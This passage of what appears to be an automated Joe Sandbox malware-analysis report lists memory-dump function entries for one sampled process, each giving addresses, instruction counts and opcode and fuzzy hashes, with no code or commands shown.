                        • Snapshot File: hcaresult_15_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 043d6968e08a26cac4041ad0f4230cd026ccd7c5c92a0b57b482192b2c0cb127
                        • Instruction ID: 7fe9567e6aab04d2d9d5e19a51525106f2b6cfbcdfb13c11a8a024dcf288ba89
                        • Opcode Fuzzy Hash: 043d6968e08a26cac4041ad0f4230cd026ccd7c5c92a0b57b482192b2c0cb127
                        • Instruction Fuzzy Hash: 21412770E1964D8FEB84EFA8C8A5AECBBF1FF59305F000169E418E7296DA346945CB41
                        Function 00007FFD9BAD3BC9 Relevance: .1, Instructions: 97COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2165994764.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6b35dd06cee8677be2c94d27d8cac2fa76a7a9775d381d1f83fbe9c45d609388
                        • Instruction ID: f3dbb1854dd9158595f5d71480129f4a51cd609288d0de4e72ad1973bb57f8f1
                        • Opcode Fuzzy Hash: 6b35dd06cee8677be2c94d27d8cac2fa76a7a9775d381d1f83fbe9c45d609388
                        • Instruction Fuzzy Hash: 80319230E0E64ECFDBB9DB9484645BD7BF0FF84300F9602B6D01EC61A1DA796A489741
                        Function 00007FFD9BAD4C57 Relevance: .1, Instructions: 95COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2165994764.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9cd33567a20b3adcf261ac30a80dbe411ef9fb37b22dacf4f812e7e9258a4736
                        • Instruction ID: 6f4ae5d03f87d0d71d863b2e89d7cc3bbf189133cd6b306867364852cb6c97a4
                        • Opcode Fuzzy Hash: 9cd33567a20b3adcf261ac30a80dbe411ef9fb37b22dacf4f812e7e9258a4736
                        • Instruction Fuzzy Hash: 19219532B1D91D5FEB28EB98D8625ACB3A1EFD5720B56077AD04EC32A2DD5879124280
                        Function 00007FFD9BACAEFF Relevance: .1, Instructions: 95COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2165994764.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b6b66661e8623b75979361d5315f4bda9edae5af851950cd5e70afe1e4e269f8
                        • Instruction ID: a6fbe0326774a349cd29938c9fc19fca1b1868509ffa89082be61bdc1b05ea00
                        • Opcode Fuzzy Hash: b6b66661e8623b75979361d5315f4bda9edae5af851950cd5e70afe1e4e269f8
                        • Instruction Fuzzy Hash: 4C310C71E1890D8FDF88EFA8C495EED77F1EF58305B4141A9D109D72A9DA38A841CB40
                        Function 00007FFD9BAD5021 Relevance: .1, Instructions: 91COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2165994764.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8dd22555cbf96ec2618412078c6224027edabb9cf68d090b715fd6b9cbc91404
                        • Instruction ID: 5bbe4178f9b7d3fd8a6571ec08c569c225bf430bd7a83b22fd46c571db8fa16b
                        • Opcode Fuzzy Hash: 8dd22555cbf96ec2618412078c6224027edabb9cf68d090b715fd6b9cbc91404
                        • Instruction Fuzzy Hash: 1421F521F1EA1D6FEB6497985C659FD7BE0EFC9300F090676E00ED31A2CE58690156C1
                        Function 00007FFD9BAD004C Relevance: .1, Instructions: 84COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2165994764.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7914d0e820150b7cff8ad7e22974f50ba92bcd99e2747088a3fdfc01efc887b4
                        • Instruction ID: ab30e261016efb19336d0d2b0909bba6078e30fc0984ff3d7af2435ba4319ed4
                        • Opcode Fuzzy Hash: 7914d0e820150b7cff8ad7e22974f50ba92bcd99e2747088a3fdfc01efc887b4
                        • Instruction Fuzzy Hash: 38218E12F1ED4A1FE7B8D72848715B963D2FFD8614B4446BAD04EC71DBDC586D028341
                        Function 00007FFD9BACBF20 Relevance: .1, Instructions: 79COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2165994764.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7c92e26f8b9c2ae7a866834edf16cbc216e156a75f50083f3af10c2c6d896574
                        • Instruction ID: a9fa80e0629535d2aff3c3aa141fe4858b1bd7f0c4a74f046833a8fdb6354f00
                        • Opcode Fuzzy Hash: 7c92e26f8b9c2ae7a866834edf16cbc216e156a75f50083f3af10c2c6d896574
                        • Instruction Fuzzy Hash: 83119022F2D91D5BDB68F79CE8A25BCB3E2EB88620B514136D00ED3391DD69A90247C0
                        Function 00007FFD9BAC184D Relevance: .1, Instructions: 64COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2165994764.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 847d1981b1c03fe82a9a21ba97f39f003a994f0e37b55df9ec3d464bfb253573
                        • Instruction ID: cec23c1ed66eae478b9972e26a64ca3ca11274564be351cfe42cad7c55bcdf0f
                        • Opcode Fuzzy Hash: 847d1981b1c03fe82a9a21ba97f39f003a994f0e37b55df9ec3d464bfb253573
                        • Instruction Fuzzy Hash: 22116D31A1995D8FDF90EF98D864AED7BF0FF58300F010576E408E3291DA74A9508B80
                        Function 00007FFD9BAD2715 Relevance: .1, Instructions: 54COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2165994764.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2ce650a205ea09545ef0ac62692209f0bbbdcf4a0fd7ca17615e9a75107e09d4
                        • Instruction ID: 4cd8991848811964c5bd7b4bcb13273b525d57287adf2f0a0387c1d925b79476
                        • Opcode Fuzzy Hash: 2ce650a205ea09545ef0ac62692209f0bbbdcf4a0fd7ca17615e9a75107e09d4
                        • Instruction Fuzzy Hash: 5F115471E0964D8FDFA9DF98C865AA8B7A0FF68310F0401BED00EE71A5DA755940CB01
                        Function 00007FFD9BAC5054 Relevance: .0, Instructions: 49COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2165994764.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dc1070a26120990d015b3a8d4f0ce30f43f14a184ff7bf864e1de3325afc5606
                        • Instruction ID: 1c89bf6e3128bac94aab91c8913d7cfd78137bf40089c0feb32f18a21fdca783
                        • Opcode Fuzzy Hash: dc1070a26120990d015b3a8d4f0ce30f43f14a184ff7bf864e1de3325afc5606
                        • Instruction Fuzzy Hash: 0A119330E1491C8FDB94EB68D855BECB7B1FF58201F4041AAD40DE32A6CE306E81CB40
                        Function 00007FFD9BACBFFB Relevance: .0, Instructions: 47COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2165994764.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 008e21f6595d208e438a0ff3e3adad791898aa68703e6d890b471e93bb7e98b1
                        • Instruction ID: 543e91fd49e3275bbec7cea13a4e3ebbaf26585421f547f02a3da65a48adb668
                        • Opcode Fuzzy Hash: 008e21f6595d208e438a0ff3e3adad791898aa68703e6d890b471e93bb7e98b1
                        • Instruction Fuzzy Hash: 0A016231B1DA5C5FDB54FBA8E4625ECB7E1EF49320F01407AD04EC3293EA2969528740
                        Function 00007FFD9BAC5317 Relevance: .0, Instructions: 44COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2165994764.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e8b2af0ac8123249ee0c011d67558029d3a12478a2ac443533a4e092bbd8ba3c
                        • Instruction ID: 55c639489df994711660a834fbbe7f93b95aa9103ed80ffb831f639026420cdf
                        • Opcode Fuzzy Hash: e8b2af0ac8123249ee0c011d67558029d3a12478a2ac443533a4e092bbd8ba3c
                        • Instruction Fuzzy Hash: E2012C21E0991D8EDFA4EB6888667F9B7B1FF18200F5140BAD44DE7252CE7459818B01
                        Function 00007FFD9BAD2A99 Relevance: .0, Instructions: 44COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2165994764.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 63cdf4e06d90900ed7244a79aa59ef2b2a58b8c69953effbf6a892a7fa6a3575
                        • Instruction ID: 4a2a0e520e6c15ada8e808b078e9718a4cf85316ad207f6ee8c99791ecbfe8e3
                        • Opcode Fuzzy Hash: 63cdf4e06d90900ed7244a79aa59ef2b2a58b8c69953effbf6a892a7fa6a3575
                        • Instruction Fuzzy Hash: 32011231A0891C8FCFA9EF58C854BD4B7B0FBAD315F0402A9D40DD7295D6759E84CB41
                        Function 00007FFD9BAD2A98 Relevance: .0, Instructions: 43COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2165994764.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2e3426c63493e9b304f992cdbd0fb4980e6295cb3b0844f5cdda3bb4cb18625c
                        • Instruction ID: aef91f5b968919c346ec1e7c56d35d2d8d787ff397362ae7d5cbec86e75a7c92
                        • Opcode Fuzzy Hash: 2e3426c63493e9b304f992cdbd0fb4980e6295cb3b0844f5cdda3bb4cb18625c
                        • Instruction Fuzzy Hash: 1901FF31A0891C8FCFA9EF98C858BD8B7B0FBAC315F0402A9D40DD7291DA759A84CB41
                        Function 00007FFD9BAD2B0E Relevance: .0, Instructions: 42COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2165994764.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bfec6e5549cf96a82097a02b57b179b187fa494f94dba1860aaf493b672087d1
                        • Instruction ID: ca19a29ecf6f56ad806987746530fb2bd52b39a1d62f5d18c7938df2b207ed7d
                        • Opcode Fuzzy Hash: bfec6e5549cf96a82097a02b57b179b187fa494f94dba1860aaf493b672087d1
                        • Instruction Fuzzy Hash: 05F04F3194F3CA9FD7269FF0C8615A53F64EF42200B1907FAD045CA0A2C599664AC761
                        Function 00007FFD9BACCF76 Relevance: .0, Instructions: 41COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2165994764.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c91e1fc72c0f6a0d5e22c3166b1e468c4067e58e4a9dae46ecf30487803f0b12
                        • Instruction ID: 4d996a3c6c7cbe56ed37c789d150fdba367b24487943dc4d6961fc3b4e10d969
                        • Opcode Fuzzy Hash: c91e1fc72c0f6a0d5e22c3166b1e468c4067e58e4a9dae46ecf30487803f0b12
                        • Instruction Fuzzy Hash: 5BF0CD21B19E0D4FD674FB68C4505B673E1EF58300B414979D04FC75E6DE39B8498780
                        Function 00007FFD9BAD1BD0 Relevance: .0, Instructions: 27COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2165994764.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b000579f9efd332430c81947235e169b35376f879ef9f3909e10f94e93336a57
                        • Instruction ID: 54836f06cda1e98fc6ef2fc83457af4ebd870dd7278e6f50f8ae219ac23a5988
                        • Opcode Fuzzy Hash: b000579f9efd332430c81947235e169b35376f879ef9f3909e10f94e93336a57
                        • Instruction Fuzzy Hash: 9EE04F15F0E81E0AE37422E8282417D10958BCCAA0B260739E40FC22B5FCC86A4612D1
                        Function 00007FFD9BACBB48 Relevance: .0, Instructions: 18COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2165994764.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 69a817b1dd91d5bfaf0b7268b39308e734c479d861b422f16893b22bfc27556c
                        • Instruction ID: 6c486f99c0d00fbc205aea54c2efe2d1d6d607be9fff62a9539b3050ac9d6fd0
                        • Opcode Fuzzy Hash: 69a817b1dd91d5bfaf0b7268b39308e734c479d861b422f16893b22bfc27556c
                        • Instruction Fuzzy Hash: F0D05E12E1991E0AD7A872AA64614F1B590CB8821070605B9A95EC629AECA959C14281
                        Function 00007FFD9BAD02FD Relevance: .0, Instructions: 7COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2165994764.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6d96718409fc35277133bcba8e907441104790bfb4648ac0ad7d36b6cee7ca77
                        • Instruction ID: 3787330625f608aea652f21bcb289edd17ab128f9e80809e769facd450d47059
                        • Opcode Fuzzy Hash: 6d96718409fc35277133bcba8e907441104790bfb4648ac0ad7d36b6cee7ca77
                        • Instruction Fuzzy Hash: 7FB09200ECF00F40E47223E3087507A1840AF84B90FA30334C20E012A15CDD2381A90A